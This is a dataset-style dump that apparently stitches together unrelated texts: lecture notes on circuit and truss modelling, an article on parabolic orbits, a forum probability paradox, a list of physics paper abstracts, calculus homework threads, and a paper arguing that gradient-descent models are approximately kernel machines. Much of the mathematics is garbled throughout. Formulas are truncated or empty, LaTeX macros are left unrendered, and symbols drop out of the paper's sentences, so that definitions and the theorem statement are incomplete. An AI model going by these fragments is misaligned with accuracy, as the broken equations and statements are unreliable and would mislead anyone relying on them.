arxiv_id
stringlengths 0
16
| text
stringlengths 10
1.65M
|
|---|---|
## Disclaimer
Peeter’s lecture notes from class. May not be entirely coherent.
## In slides
A review of systematic nodal analysis for a basic resistive circuit was outlined in slides, with a subsequent attempt to show how many similar linear systems can be modeled as circuits so that the same toolbox can be applied. This included blood flow through a body (and blood flow to the brain), a model of antenna interference in a portable phone, heat conduction in a one dimensional conductor under a heat lamp, and a few other systems.
This discussion reminded me of the joke where the farmer, the butcher and the physicist are all invited to talk at a beef convention. After meaningful and appropriate talks by the farmer and the butcher, the physicist gets his chance, and proceeds with “We begin by modeling the cow as a sphere, …”. The ECE equivalent of that appears to be a Kirchhoff circuit problem.
## Mechanical structures example
Continuing the application of circuits like linear systems to other systems, let’s consider a truss system as illustrated in fig. 1, or in the simpler similar system of fig. 2.
fig. 1. A static loaded truss configuratio
Our unknowns are
• positions of the joints after deformation $$(x_i, y_i)$$.
• force acting on each strut $$\BF_j = (F_{j,x}, F_{j,y})$$.
The constitutive equations, assuming static conditions (steady state, no transients)
• Load force. $$\BF_L = (F_{L, x}, F_{L, y}) = (0, -m g)$$.
• Strut forces. Under static conditions the total resulting force on the strut is zero, so $$\BF’_j = -\BF_j$$. For this problem it is redundant to label forces on both ends, so we mark the labeled end of the object with an asterisk as in fig. 3.
fig 3. Strut model
### Consider a simple case
One strut as in fig. 4.
fig. 4. Very simple static load
\label{eqn:multiphysicsL1:20}
\BF^\conj = – \Ba_x
\underbrace{
\epsilon
}_{\text{constant, describes the beam elasticity, given}}
\biglr{
\underbrace{
L
}_{\text{unloaded length $$L = \Abs{x^\conj – 0}$$, given}}
– L_0}
The constitutive law for a general strut as in fig. 5 is
fig 5. Strut force diagram
The force is directed along the unit vector
\label{eqn:multiphysicsL1:40}
\Be = \frac{\Br^\conj – \Br}{\Abs{\Br^\conj – \Br}},
and has the form
\label{eqn:multiphysicsL1:60}
\BF^\conj = – \Be \epsilon \lr{ L – L_0 }.
The value $$\epsilon$$ may be related to Hooks’ constant, and $$L_0$$ is given by
\label{eqn:multiphysicsL1:80}
L = \Abs{\Br^\conj – \Br} = \sqrt{(x^\conj – x)^2 + (y^\conj – y)^2}.
Observe that the relation between $$\BF^\conj$$ and position is nonlinear!
Treatment of this system will be used as the prototype for our handling of other nonlinear systems.
Returning to the simple static system, and introducing force and joint labels as in fig. 6, we can examine the \textAndIndex{conservation law}, the balance of forces.
fig 6. Strut system
• At joint 1:\label{eqn:multiphysicsL1:100}
\Bf_A + \Bf_B + \Bf_C = 0
or
\label{eqn:multiphysicsL1:120}
\begin{aligned}
\Bf_{A,x} + \Bf_{B,x} + \Bf_{C,x} &= 0 \\
\Bf_{A,y} + \Bf_{B,y} + \Bf_{C,y} &= 0
\end{aligned}
• At joint 2:\label{eqn:multiphysicsL1:140}
-\Bf_C + \Bf_D + \Bf_L = 0
or
\label{eqn:multiphysicsL1:160}
\begin{aligned}
-\Bf_{C,x} + \Bf_{D,x} + \Bf_{L,x} &= 0 \\
-\Bf_{C,y} + \Bf_{D,y} + \Bf_{L,y} &= 0
\end{aligned}
We have an equivalence
• Force $$\leftrightarrow$$ Current.
• Force balance equation $$\leftrightarrow$$ KCL
|
|
• 107328 Infos
# Parabolic trajectory
In astrodynamics or celestial mechanics a parabolic trajectory is an orbit with the eccentricity equal to 1. When moving away from the source it is called an escape orbit, otherwise a capture orbit.
Under standard assumptions a body traveling along an escape orbit will coast to infinity, with velocity relative to the central body tending to zero, and therefore will never return. Parabolic trajectory is a minimum-energy escape trajectory.
## Velocity
Under standard assumptions the orbital velocity ($v,$) of a body traveling along parabolic trajectory can be computed as:
$v=sqrt\left\{2muover\left\{r\right\}\right\}$
where:
• $r,!$ is radial distance of orbiting body from central body,
• $mu,!$ is standard gravitational parameter.
At any position the orbiting body has the escape velocity for that position.
If the body has the escape velocity with respect to the Earth, this is not enough to escape the Solar System, so near the Earth the orbit resembles a parabola, but further away it bends into an elliptical orbit around the Sun.
This velocity ($v,$) is closely related to the orbital velocity of a body in a circular orbit of the radius equal to the radial position of orbiting body on the parabolic trajectory:
$v=sqrt\left\{2\right\}cdot v_O$
where:
• $v_O,!$ is orbital velocity of a body in circular orbit.
## Equation of motion
Under standard assumptions, for a body moving along this kind of trajectory an orbital equation becomes:
$r=$
where:
• $r,$ is radial distance of orbiting body from central body,
• $h,$ is specific angular momentum of the orbiting body,
• $theta,$ is a true anomaly of the orbiting body,
• $mu,$ is standard gravitational parameter.
## Energy
Under standard assumptions, specific orbital energy ($epsilon,$) of parabolic trajectory is zero, so the orbital energy conservation equation for this trajectory takes form:
$epsilon=\left\{v^2over2\right\}-\left\{muover\left\{r\right\}\right\}=0$
where:
• $v,$ is orbital velocity of orbiting body,
• $r,$ is radial distance of orbiting body from central body,
• $mu,$ is standard gravitational parameter.
|
|
×
# What are the chances?
If you choose the answer to this question at random, what is the probability that it will be correct?
a) $$25$$ %
b) $$50$$ %
c) $$0$$ %
d) $$25$$ %
Good Luck. :)
Note by Muzaffar Ahmed
3 years, 1 month ago
Sort by:
25% · 2 years, 9 months ago
25 % . Because there are four options each contributing 25 % · 3 years, 1 month ago
Not so simple, man, not so simple · 3 years, 1 month ago
pray tell us the answer!!!!!!!!! · 3 years, 1 month ago
I guess these sort of questions are good for discussions rather for finding answers. For any answer there is a contradictory statement ......:) how about considering both 25% into single unit and the remaining 0 and 50 we get one more combination 1/3*100 · 3 years, 1 month ago
They are not one unit.. They are different options and the question is about choosing one option randomly... · 3 years, 1 month ago
50% · 3 years, 1 month ago
Why 50% ? · 3 years, 1 month ago
25% · 3 years, 1 month ago
Why 25% ? · 3 years, 1 month ago
50% · 3 years, 1 month ago
0% is the correct answer .............. if it would have been 25% then if we chose randomly, there are 2 choices out of a total of four , that seem optimal ( i.e. option(a and (d ) so that would mean that the probability would be equal to 50 % ........ Contradictory! if it would have been 50% , then it would have meant that only one choice out of the four is correct i.e. 25%... this answer is also contradictory to itself.......... if it would have been 0% then again it would imply that one choice out of the four is correct i.e. 25% ...... hence it seems that none of the option is correct ......... that leads us to the answer 0% , and hence this answer is not in contrary to itself!!!!!!! · 3 years, 1 month ago
If 0% is correct, then it is one of the four options, which would give you 25% probability again. · 3 years, 1 month ago
Agree. Can't be zero percent.If one of the options is correct and the user selects it randomly it definitely will have a probability. I will still stick to 25% . because among 4 options only one is correct and the probability for that becomes 25%(1/4 multiloed by 100) · 3 years, 1 month ago
There are 2 instances of the option 25%, so if 25% is correct, you will have $$\frac{2}{4} \times 100 = 50$$ % probability. · 3 years, 1 month ago
|
|
• ### Cycle-expansion method for the Lyapunov exponent, susceptibility, and higher moments(1707.00708)
Sept. 20, 2017 cond-mat.stat-mech
Lyapunov exponents characterize the chaotic nature of dynamical systems by quantifying the growth rate of uncertainty associated with the imperfect measurement of initial conditions. Finite-time estimates of the exponent, however, experience fluctuations due to both the initial condition and the stochastic nature of the dynamical path. The scale of these fluctuations is governed by the Lyapunov susceptibility, the finiteness of which typically provides a sufficient condition for the law of large numbers to apply. Here, we obtain a formally exact expression for this susceptibility in terms of the Ruelle dynamical zeta function for one-dimensional systems. We further show that, for systems governed by sequences of random matrices, the cycle expansion of the zeta function enables systematic computations of the Lyapunov susceptibility and of its higher-moment generalizations. The method is here applied to a class of dynamical models that maps to static disordered spin chains with interactions stretching over a varying distance, and is tested against Monte Carlo simulations.
• ### Optimizing collective fieldtaxis of swarming agents through reinforcement learning(1709.02379)
Swarming of animal groups enthralls scientists in fields ranging from biology to physics to engineering. Complex swarming patterns often arise from simple interactions between individuals to the benefit of the collective whole. The existence and success of swarming, however, nontrivially depend on microscopic parameters governing the interactions. Here we show that a machine-learning technique can be employed to tune these underlying parameters and optimize the resulting performance. As a concrete example, we take an active matter model inspired by schools of golden shiners, which collectively conduct phototaxis. The problem of optimizing the phototaxis capability is then mapped to that of maximizing benefits in a continuum-armed bandit game. The latter problem accepts a simple reinforcement-learning algorithm, which can tune the continuous parameters of the model. This result suggests the utility of machine-learning methodology in swarm-robotics applications.
• ### Breaking the glass ceiling: Configurational entropy measurements in extremely supercooled liquids(1704.08257)
Liquids relax extremely slowly on approaching the glass state. One explanation is that an entropy crisis, due to the rarefaction of available states, makes it increasingly arduous to reach equilibrium in that regime. Validating this scenario is challenging, because experiments offer limited resolution, while numerical studies lag more than eight orders of magnitude behind experimentally-relevant timescales. In this work we not only close the colossal gap between experiments and simulations but manage to create in-silico configurations that have no experimental analog yet. Deploying a range of computational tools, we obtain four estimates of their configurational entropy. These measurements consistently confirm that the steep entropy decrease observed in experiments is found also in simulations even beyond the experimental glass transition. Our numerical results thus open a new observational window into the physics of glasses and reinforce the relevance of an entropy crisis for understanding their formation.
• ### Nontrivial critical fixed point for replica-symmetry-breaking transitions(1607.04217)
The transformation of the free-energy landscape from smooth to hierarchical is one of the richest features of mean-field disordered systems. A well-studied example is the de Almeida-Thouless transition for spin glasses in a magnetic field, and a similar phenomenon--the Gardner transition--has recently been predicted for structural glasses. The existence of these replica-symmetry-breaking phase transitions has, however, long been questioned below their upper critical dimension, d_u=6. Here, we obtain evidence for the existence of these transitions in d<d_u using a two-loop calculation. Because the critical fixed point is found in the strong-coupling regime, we corroborate the result by resumming the perturbative series with inputs from a three-loop calculation and an analysis of its large-order behavior. Our study offers a resolution of the long-lasting controversy surrounding phase transitions in finite-dimensional disordered systems.
• ### Point-to-set lengths, local structure, and glassiness(1511.03573)
The growing sluggishness of glass-forming liquids is thought to be accompanied by growing structural order. The nature of such order, however, remains hotly debated. A decade ago, point-to-set (PTS) correlation lengths were proposed as measures of amorphous order in glass formers, but recent results raise doubts as to their generality. Here, we extend the definition of PTS correlations to agnostically capture any type of growing order in liquids, be it local or amorphous. This advance enables the formulation of a clear distinction between slowing down due to conventional critical ordering and that due to glassiness, and provides a unified framework to assess the relative importance of specific local order and generic amorphous order in glass formation.
• ### Linking dynamical heterogeneity to static amorphous order(1309.5085)
Aug. 19, 2016 cond-mat.dis-nn
Glass-forming liquids grow dramatically sluggish upon cooling. This slowdown has long been thought to be accompanied by a growing correlation length. Characteristic dynamical and static length scales, however, have been observed to grow at different rates, which perplexes the relationship between the two and with the slowdown. Here, we show the existence of a direct link between dynamical sluggishness and static point-to-set correlations, holding at the local level as we probe different environments within a liquid. This link, which is stronger and more general than that observed with locally preferred structures, suggests the existence of an intimate relationship between structure and dynamics in a broader range of glass-forming liquids than previously thought.
• ### Efficient measurement of point-to-set correlations and overlap fluctuations in glass-forming liquids(1510.06320)
Cavity point-to-set correlations are real-space tools to detect the roughening of the free-energy landscape that accompanies the dynamical slowdown of glass-forming liquids. Measuring these correlations in model glass formers remains, however, a major computational challenge. Here, we develop a general parallel-tempering method that provides orders-of-magnitude improvement for sampling and equilibrating configurations within cavities. We apply this improved scheme to the canonical Kob-Andersen binary Lennard-Jones model for temperatures down to the mode-coupling theory crossover. Most significant improvements are noted for small cavities, which have thus far been the most difficult to study. This methodological advance also enables us to study a broader range of physical observables associated with thermodynamic fluctuations. We measure the probability distribution of overlap fluctuations in cavities, which displays a non-trivial temperature evolution. The corresponding overlap susceptibility is found to provide a robust quantitative estimate of the point-to-set length scale requiring no fitting. By resolving spatial fluctuations of the overlap in the cavity, we also obtain quantitative information about the geometry of overlap fluctuations. We can thus examine in detail how the penetration length as well as its fluctuations evolve with temperature and cavity size.
• ### Glassy slowdown and replica-symmetry-breaking instantons(1406.1498)
Glass-forming liquids exhibit a dramatic dynamical slowdown as the temperature is lowered. This can be attributed to relaxation proceeding via large structural rearrangements whose characteristic size increases as the system cools. These cooperative rearrangements are well modeled by instantons in a replica effective field theory, with the size of the dominant instanton encoding the liquid's cavity point-to-set correlation length. Varying the parameters of the effective theory corresponds to varying the statistics of the underlying free-energy landscape. We demonstrate that, for a wide range of parameters, replica-symmetry-breaking instantons dominate. The detailed structure of the dominant instanton provides a rich window into point-to-set correlations and glassy dynamics.
• ### Critical Exponents for Supercooled Liquids(1302.2917)
We compute critical exponents governing universal features of supercooled liquids through the effective theory of an overlap field. The correlation length diverges with the Ising exponent; the size of dynamically heterogeneous patches grows more rapidly; and the relaxation time obeys a generalized Vogel-Fulcher-Tammann relation.
• ### Effective Field Theory for Supercooled Liquids(1212.0857)
Starting from a microscopic model of liquids, we construct an effective theory of an overlap field through duplication of the system and coarse-graining. We then propose a recipe to extract a relaxation time and two characteristic length scales of a supercooled liquid from this effective field theory. Appealing to the Ginzburg-Landau-Wilson paradigm near the putative critical point, we further conclude that this effective field theory resides within the Ising universality class.
• ### Point-to-set correlations and instantons(1311.7142)
For a generic many-body system, we define a soft point-to-set correlation function. We then show that this function accepts a representation in terms of an effective overlap field theory. In particular, instantons in this effective field theory encode point-to-set correlations for supercooled liquids.
• ### Lifshitz Tails of Scale-Invariant Theories with Electric Impurities(1207.3353)
We study scale-invariant systems in the presence of Gaussian quenched electric disorder, focusing on the tails of the energy spectra induced by disorder. For relevant disorder we derive asymptotic expressions for the densities of unit-charged states in the tails, positing the existence of saddle points in appropriate disorder integrals. The resultant scalings are dictated by spatial dimensions and dynamical exponents of the systems.
• ### Instanton Calculus of Lifshitz Tails(1205.0005)
April 30, 2012 hep-th, cond-mat.dis-nn
For noninteracting particles moving in a Gaussian random potential, there exists a disagreement in the literature on the asymptotic expression for the density of states in the tail of the band. We resolve this discrepancy. Further we illuminate the physical facet of instantons appearing in replica and supersymmetric derivations with another derivation employing a Lagrange multiplier field.
• ### Disordered Holographic Systems II: Marginal Relevance of Imperfection(1201.6366)
Jan. 30, 2012 hep-th, cond-mat.str-el
We continue our study of quenched disorder in holographic systems, focusing on the effects of mild electric disorder. By studying the renormalization group evolution of the disorder distribution at subleading order in perturbations away from the clean fixed point, we show that electric disorder is marginally relevant in (2+1)-dimensional holographic conformal field theories.
• ### Disordered Holographic Systems I: Functional Renormalization(1102.2892)
Feb. 14, 2011 hep-th, cond-mat.str-el
We study quenched disorder in strongly correlated systems via holography, focusing on the thermodynamic effects of mild electric disorder. Disorder is introduced through a random potential which is assumed to self-average on macroscopic scales. Studying the flow of this distribution with energy scale leads us to develop a holographic functional renormalization scheme. We test this scheme by computing thermodynamic quantities and confirming that the Harris criterion for relevance, irrelevance or marginality of quenched disorder holds.
• ### Adventures in Holographic Dimer Models(1009.3268)
Jan. 10, 2011 hep-th, cond-mat.str-el
We abstract the essential features of holographic dimer models, and develop several new applications of these models. First, semi-holographically coupling free band fermions to holographic dimers, we uncover novel phase transitions between conventional Fermi liquids and non-Fermi liquids, accompanied by a change in the structure of the Fermi surface. Second, we make dimer vibrations propagate through the whole crystal by way of double trace deformations, obtaining nontrivial band structure. In a simple toy model, the topology of the band structure experiences an interesting reorganization as we vary the strength of the double trace deformations. Finally, we develop tools that would allow one to build, in a bottom-up fashion, a holographic avatar of the Hubbard model.
• ### Holographic Lattices, Dimers, and Glasses(0909.2639)
Jan. 27, 2010 hep-th, cond-mat.str-el
We holographically engineer a periodic lattice of localized fermionic impurities within a plasma medium by putting an array of probe D5-branes in the background produced by N D3-branes. Thermodynamic quantities are computed in the large N limit via the holographic dictionary. We then dope the lattice by replacing some of the D5-branes by anti-D5-branes. In the large N limit, we determine the critical temperature below which the system dimerizes with bond ordering. Finally, we argue that for the special case of a square lattice our system is glassy at large but finite N, with the low temperature physics dominated by a huge collection of metastable dimerized configurations without long-range order, connected only through tunneling events.
• ### Landscape versus Swampland for Higher Derivative Gravity(0902.1770)
Feb. 10, 2009 hep-th
We survey recent studies of Gauss-Bonnet gravity and its dual conformal field theories, including their relation to the violation of the Kovtun-Starinets-Son viscosity bound. Via holography, we can also study properties such as microcausality and unitarity of boundary field theory duals. Such studies in turn supply constraints on bulk gravitational theories, consigning some of them to the swampland.
• ### Viscosity Bound Violation in Higher Derivative Gravity(0712.0805)
June 13, 2008 hep-th, hep-ph, gr-qc
Motivated by the vast string landscape, we consider the shear viscosity to entropy density ratio in conformal field theories dual to Einstein gravity with curvature square corrections. After field redefinitions these theories reduce to Gauss-Bonnet gravity, which has special properties that allow us to compute the shear viscosity nonperturbatively in the Gauss-Bonnet coupling. By tuning of the coupling, the value of the shear viscosity to entropy density ratio can be adjusted to any positive value from infinity down to zero, thus violating the conjectured viscosity bound. At linear order in the coupling, we also check consistency of four different methods to calculate the shear viscosity, and we find that all of them agree. We search for possible pathologies associated with this class of theories violating the viscosity bound.
• ### Viscosity Bound and Causality Violation(0802.3318)
May 22, 2008 hep-th, hep-ph, gr-qc
In recent work we showed that, for a class of conformal field theories (CFT) with Gauss-Bonnet gravity dual, the shear viscosity to entropy density ratio, $\eta/s$, could violate the conjectured Kovtun-Starinets-Son viscosity bound, $\eta/s\geq1/4\pi$. In this paper we argue, in the context of the same model, that tuning $\eta/s$ below $(16/25)(1/4\pi)$ induces microcausality violation in the CFT, rendering the theory inconsistent. This is a concrete example in which inconsistency of a theory and a lower bound on viscosity are correlated, supporting the idea of a possible universal lower bound on $\eta/s$ for all consistent theories.
• ### Energy Conditions and Junction Conditions(gr-qc/0505048)
Aug. 22, 2005 astro-ph, hep-th, gr-qc
We consider the familiar junction conditions described by Israel for thin timelike walls in Einstein-Hilbert gravity. One such condition requires the induced metric to be continuous across the wall. Now, there are many spacetimes with sources confined to a thin wall for which this condition is violated and the Israel formalism does not apply. However, we explore the conjecture that the induced metric is in fact continuous for any thin wall which models spacetimes containing only positive energy matter. Thus, the usual junction conditions would hold for all positive energy spacetimes. This conjecture is proven in various special cases, including the case of static spacetimes with spherical or planar symmetry as well as settings without symmetry which may be sufficiently well approximated by smooth spacetimes with well-behaved null geodesic congruences.
|
|
Math Help - Derivative of abs(x) at x=0
1. Derivative of abs(x) at x=0
Can somebody explain why does the derivative of abs(x) at x=0 not exist?
Thanks
2. Re: Derivative of abs(x) at x=0
Hey mcleja.
Hint: Look at the derivative from the right hand side and the left hand sides and show that they aren't equal.
3. Re: Derivative of abs(x) at x=0
Ahhhh ok, thanks chiro.
|
|
# Homework Help: Natural log of a sum? (not sum of natural logs)
1. Oct 25, 2012
### yiyopr
1. The problem statement, all variables and given/known data
Find the derivative of y = x^2 + x^(2x)
3. The attempt at a solution
By looking at the equation I think I need to use implicit differentiation + natural logs. But I can't do anything with:
lny = ln(x^2 + x^(2x))
So I assume I'm wrong.. Any help??
2. Oct 25, 2012
### gabbagabbahey
Use the linearity of the derivative operator: $\frac{dy}{dx} = \frac{d}{dx}\left(x^2+x^{2x} \right) = \frac{d}{dx}\left(x^2 \right) + \frac{d}{dx}\left(x^{2x} \right)$. Compute each derivative separately and then add the results.
Share this great discussion with others via Reddit, Google+, Twitter, or Facebook
|
|
Every Model Learned by Gradient Descent Is Approximately a Kernel Machine
Every Model Learned by Gradient Descent Is Approximately a Kernel Machine
Abstract
Deep learning’s successes are often attributed to its ability to automatically discover new representations of the data, rather than relying on handcrafted features like other learning methods. We show, however, that deep networks learned by the standard gradient descent algorithm are in fact mathematically approximately equivalent to kernel machines, a learning method that simply memorizes the data and uses it directly for prediction via a similarity function (the kernel). This greatly enhances the interpretability of deep network weights, by elucidating that they are effectively a superposition of the training examples. The network architecture incorporates knowledge of the target function into the kernel. This improved understanding should lead to better learning algorithms.
Deep Networks Are Kernel MachinesDomingos \firstpageno1
\editor{keywords}
gradient descent, kernel machines, deep learning, representation learning, neural tangent kernel
1 Introduction
Despite its many successes, deep learning remains poorly understood (Goodfellow et al., 2016). In contrast, kernel machines are based on a well-developed mathematical theory, but their empirical performance generally lags behind that of deep networks (Schölkopf and Smola, 2002). The standard algorithm for learning deep networks, and many other models, is gradient descent (Rumelhart et al., 1986). Here we show that every model learned by this method, regardless of architecture, is approximately equivalent to a kernel machine with a particular type of kernel. This kernel measures the similarity of the model at two data points in the neighborhood of the path taken by the model parameters during learning. Kernel machines store a subset of the training data points and match them to the query using the kernel. Deep network weights can thus be seen as a superposition of the training data points in the kernel’s feature space, enabling their efficient storage and matching. This contrasts with the standard view of deep learning as a method for discovering representations from data, with the attendant lack of interpretability (Bengio et al., 2013). Our result also has significant implications for boosting algorithms (Freund and Schapire, 1997), probabilistic graphical models (Koller and Friedman, 2009), and convex optimization (Boyd and Vandenberghe, 2004).
2 Path Kernels
A kernel machine is a model of the form
y=g(∑iaiK(x,xi)+b),
where is the query data point, the sum is over training data points , is an optional nonlinearity, the ’s and are learned parameters, and the kernel measures the similarity of its arguments (Schölkopf and Smola, 2002). In supervised learning, is typically a linear function of , the known output for . Kernels may be predefined or learned (Cortes et al., 2009). Kernel machines, also known as support vector machines, are one of the most developed and widely used machine learning methods. In the last decade, however, they have been eclipsed by deep networks, also known as neural networks and multilayer perceptrons, which are composed of multiple layers of nonlinear functions. Kernel machines can be viewed as neural networks with one hidden layer, with the kernel as the nonlinearity. For example, a Gaussian kernel machine is a radial basis function network (Poggio and Girosi, 1990). But a deep network would seem to be irreducible to a kernel machine, since it can represent some functions exponentially more compactly than a shallow one (Delalleau and Bengio, 2011; Cohen et al., 2016).
Whether a representable function is actually learned, however, depends on the learning algorithm. Most deep networks, and indeed most machine learning models, are trained using variants of gradient descent (Rumelhart et al., 1986). Given an initial parameter vector and a loss function , gradient descent repeatedly modifies the model’s parameters by subtracting the loss’s gradient from them, scaled by the learning rate :
ws+1=ws−ϵ∇wL(ws).
The process terminates when the gradient is zero and the loss is therefore at an optimum (or saddle point). Remarkably, we have found that learning by gradient descent is a strong enough constraint that the end result is guaranteed to be approximately a kernel machine, regardless of the number of layers or other architectural features of the model.
Specifically, the kernel machines that result from gradient descent use what we term a path kernel. If we take the learning rate to be infinitesimally small, the path kernel between two data points is simply the integral of the dot product of the model’s gradients at the two points over the path taken by the parameters during gradient descent:
K(x,x′)=∫c(t)∇wy(x)⋅∇wy(x′)dt,
where is the path. Intuitively, the path kernel measures how similarly the model at the two data points varies during learning. The more similar the variation for and , the higher the weight of in predicting . Fig. 1 illustrates this graphically.
Our result builds on the concept of neural tangent kernel, recently introduced to analyze the behavior of deep networks (Jacot et al., 2018). The neural tangent kernel is the integrand of the path kernel when the model is a multilayer perceptron. Because of this, and since a sum of positive definite kernels is also a positive definite kernel (Schölkopf and Smola, 2002), the known conditions for positive definiteness of neural tangent kernels extend to path kernels (Jacot et al., 2018). A positive definite kernel is equivalent to a dot product in a derived feature space, which greatly simplifies its analysis (Schölkopf and Smola, 2002).
We now present our main result. For simplicity, in the derivations below we assume that is a (real-valued) scalar, but it can be made a vector with only minor changes. The data points can be arbitrary structures.
{definition}
The tangent kernel associated with function and parameter vector is
, with the gradients taken at .
{definition}
The path kernel associated with function and curve in parameter space is .
{theorem}
Suppose the model , with a differentiable function of , is learned from a training set by gradient descent with differentiable loss function and learning rate . Then
limϵ→0y=m∑i=1aiK(x,xi)+b,
where is the path kernel associated with and the path taken by the parameters during gradient descent, is the average along the path weighted by the corresponding tangent kernel, and is the initial model.
{proof}
In the limit, the gradient descent equation, which can also be written as
ws+1−wsϵ=−∇wL(ws),
where is the loss function, becomes the differential equation
dw(t)dt=−∇wL(w(t)).
(This is known as a gradient flow (Ambrosio et al., 2008).) Then for any differentiable function of the weights ,
dydt=d∑j=1∂y∂wjdwjdt,
where is the number of parameters. Replacing by its gradient descent expression:
dydt=d∑j=1∂y∂wj(−∂L∂wj).
Applying the additivity of the loss and the chain rule of differentiation:
dydt=d∑j=1∂y∂wj(−m∑i=1∂L∂yi∂yi∂wj).
Rearranging terms:
dydt=−m∑i=1∂L∂yid∑j=1∂y∂wj∂yi∂wj.
Let , the loss derivative for the th output. Applying this and Definition 2:
dydt=−m∑i=1L′(y∗i,yi)Kgf,w(t)(x,xi).
Let be the initial model, prior to gradient descent. Then for the final model :
limϵ→0y=y0−∫c(t)m∑i=1L′(y∗i,yi)Kgf,w(t)(x,xi)dt,
where is the path taken by the parameters during gradient descent. Multiplying and dividing by :
limϵ→0y=y0−m∑i=1⎛⎝∫c(t)Kgf,w(t)(x,xi)L′(y∗i,yi)dt∫c(t)Kgf,w(t)(x,xi)dt⎞⎠∫c(t)Kgf,w(t)(x,xi)dt.
Let , the average loss derivative weighted by similarity to . Applying this and Definition 2:
limϵ→0y=y0−m∑i=1¯¯¯¯¯L′(y∗i,yi)Kpf,c(x,xi).
Thus
limϵ→0y=m∑i=1aiK(x,xi)+b,
with , , and .
{remark}
This differs from typical kernel machines in that the ’s and depend on . Nevertheless, the ’s play a role similar to the example weights in ordinary SVMs and the perceptron algorithm: examples that the loss is more sensitive to during learning have a higher weight. is simply the prior model, and the final model is thus the sum of the prior model and the model learned by gradient descent, with the query point entering the latter only through kernels. Since Theorem 2 applies to every as a query throughout gradient descent, the training data points also enter the model only through kernels (initial model aside).
{remark}
Theorem 2 can equally well be proved using the loss-weighted path kernel , in which case for all .
{remark}
In least-squares regression, . When learning a classifier by minimizing cross-entropy, the standard practice in deep learning, the function to be estimated is the conditional probability of the class, , the loss is , and the loss derivative for the th output is . Similar expressions hold for modeling a joint distribution by minimizing negative log likelihood, with as the probability of the data point.
{remark}
to .
{remark}
The proof above is for batch gradient descent, which uses all training data points at each step. To extend it to stochastic gradient descent, which uses a subsample, it suffices to multiply each term in the summation over data points by an indicator function that is 1 if the th data point is included in the subsample at time and 0 otherwise. The only change this causes in the result is that the path kernel and average loss derivative for a data point are now stochastic integrals. Based on previous results (Scieur et al., 2017), Theorem 2 or a similar result seems likely to also apply to further variants of gradient descent, but proving this remains an open problem.
For linear models, the path kernel reduces to the dot product of the data points. It is well known that a single-layer perceptron is a kernel machine, with the dot product as the kernel (Aizerman et al., 1964). Our result can be viewed as a generalization of this to multilayer perceptrons and other models. It is also related to Lippmann et al.’s proof that Hopfield networks, a predecessor of many current deep architectures, are equivalent to the nearest-neighbor algorithm, a predecessor of kernel machines, with Hamming distance as the comparison function (Lippmann et al., 1987).
The result assumes that the learning rate is sufficiently small for the trajectory of the weights during gradient descent to be well approximated by a smooth curve. This is standard in the analysis of gradient descent, and is also generally a good approximation in practice, since the learning rate has to be quite small in order to avoid divergence (e.g., ) (Goodfellow et al., 2016). Nevertheless, it remains an open question to what extent models learned by gradient descent can still be approximated by kernel machines outside of this regime.
3 Discussion
A notable disadvantage of deep networks is their lack of interpretability (Zhang and Zhu, 2018). Knowing that they are effectively path kernel machines greatly ameliorates this. In particular, the weights of a deep network have a straightforward interpretation as a superposition of the training examples in gradient space, where each example is represented by the corresponding gradient of the model. Fig. 2 illustrates this. One well-studied approach to interpreting the output of deep networks involves looking for training instances that are close to the query in Euclidean or some other simple space (Ribeiro et al., 2016). Path kernels tell us what the exact space for these comparisons should be, and how it relates to the model’s predictions.
Experimentally, deep networks and kernel machines often perform more similarly than would be expected based on their mathematical formulation (Brendel and Bethge, 2019). Even when they generalize well, deep networks often appear to memorize and replay whole training instances (Zhang et al., 2017; Devlin et al., 2015). The fact that deep networks are in fact kernel machines helps explain both of these observations. It also sheds light on the surprising brittleness of deep models, whose performance can degrade rapidly as the query point moves away from the nearest training instance (Szegedy et al., 2014), since this is what is expected of kernel estimators in high-dimensional spaces (Hardle et al., 2004).
Perhaps the most significant implication of our result for deep learning is that it casts doubt on the common view that it works by automatically discovering new representations of the data, in contrast with other machine learning methods, which rely on predefined features (Bengio et al., 2013). As it turns out, deep learning also relies on such features, namely the gradients of a predefined function, and uses them for prediction via dot products in feature space, like other kernel machines. All that gradient descent does is select features from this space for use in the kernel. If gradient descent is limited in its ability to learn representations, better methods for this purpose are a key research direction. Current nonlinear alternatives include predicate invention (Muggleton and Buntine, 1988) and latent variable discovery in graphical models (Elidan et al., 2000). Techniques like structure mapping (Gentner, 1983), crossover (Holland, 1975) and predictive coding (Rao and Ballard, 1999) may also be relevant. Ultimately, however, we may need entirely new approaches to solve this crucial but extremely difficult problem.
Our result also has significant consequences on the kernel machine side. Path kernels provide a new and very flexible way to incorporate knowledge of the target function into the kernel. Previously, it was only possible to do so in a weak sense, via generic notions of what makes two data points similar. The extensive knowledge that has been encoded into deep architectures by applied researchers, and is crucial to the success of deep learning, can now be ported directly to kernel machines. For example, kernels with translation invariance or selective attention are directly obtainable from the architecture of, respectively, convolutional neural networks (LeCun et al., 1998) or transformers (Vaswani et al., 2017).
A key property of path kernels is that they combat the curse of dimensionality by incorporating derivatives into the kernel: two data points are similar if the candidate function’s derivatives at them are similar, rather than if they are close in the input space. This can greatly improve kernel machines’ ability to approximate highly variable functions (Bengio et al., 2005). It also means that points that are far in Euclidean space can be close in gradient space, potentially improving the ability to model complex functions. (For example, the maxima of a sine wave are all close in gradient space, even though they can be arbitrarily far apart in the input space.)
Most significantly, however, learning path kernel machines via gradient descent largely overcomes the scalability bottlenecks that have long limited the applicability of kernel methods to large data sets. Computing and storing the Gram matrix at learning time, with its quadratic cost in the number of examples, is no longer required. (The Gram matrix is the matrix of applications of the kernel to all pairs of training examples.) Separately storing and matching (a subset of) the training examples at query time is also no longer necessary, since they are effectively all stored and matched simultaneously via their superposition in the model parameters. The storage space and matching time are independent of the number of examples. (Interestingly, superposition has been hypothesized to play a key role in combatting the combinatorial explosion in visual cognition (Arathorn, 2002), and is also essential to the efficiency of quantum computing (Nielsen and Chuang, 2000) and radio communication (Carlson and Grilly, 2009).) Further, the same specialized hardware that has given deep learning a decisive edge in scaling up to large data (Raina et al., 2009) can now be used for kernel machines as well.
The significance of our result extends beyond deep networks and kernel machines. In its light, gradient descent can be viewed as a boosting algorithm, with tangent kernel machines as the weak learner and path kernel machines as the strong learner obtained by boosting it (Freund and Schapire, 1997). In each round of boosting, the examples are weighted by the corresponding loss derivatives. It is easily seen that each round (gradient descent step) decreases the loss, as required. The weight of the model at a given round is the learning rate for that step, which can be constant or the result of a line search (Boyd and Vandenberghe, 2004). In the latter case gradient descent is similar to gradient boosting (Mason et al., 1999).
